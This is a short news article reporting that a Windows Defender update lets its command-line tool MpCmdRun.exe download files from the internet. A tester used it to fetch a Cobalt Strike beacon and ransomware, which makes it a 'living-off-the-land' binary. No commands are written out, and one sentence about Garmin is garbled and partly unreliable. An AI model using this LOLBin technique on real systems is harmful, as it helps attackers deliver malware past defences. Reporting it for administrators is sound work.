A recent update to Windows 10's built-in antivirus software taught the program a new trick to download files using a command-line tool.

Downloading malware is not the intended purpose. However, the new feature could be exploited in such a way. Fortunately, unless one is a PC masochist, the average home user need not worry.

This new capability was discovered by Mohammad Asker (via Bleeping Computer), a security penetration tester and instructor who has contributed hundreds of security articles (according to his Udemy profile).

"Now, you can use Windows Defender itself to download files from the Internet. In this example, I was able to download the Cobalt Strike beacon using the binary 'MpCmdRun.exe' which is the "Microsoft Malware Protection Command Line," Askar said on Twitter.

This allows local attackers to leverage Defender as what is called a living-off-the-land binary (LOLBin). This is the use of legitimate software for malicious purposes, in this case using an antivirus program to download viruses.

This new feature was apparently added to Defender in the July 4.18.2007.8 update; Bleeping Computer tested a new download switch for its command-line tool, which recently caused a ruckus in Garmin's infrastructure and cost the company several It was able to download the same WastedLocker ransomware that allegedly caused a multi-million dollar ransom to be paid by the company.

This is not as careless as it may seem. For one thing, Defender scans files downloaded this way, so in theory it should protect against malware. And second, this needs to be initiated by a local user.

Nevertheless, this is something that the system administrator should know and can take appropriate precautions. It is not unheard of for a rogue employee, whether disgruntled, on the verge of termination, or for any other reason, to pull a prank.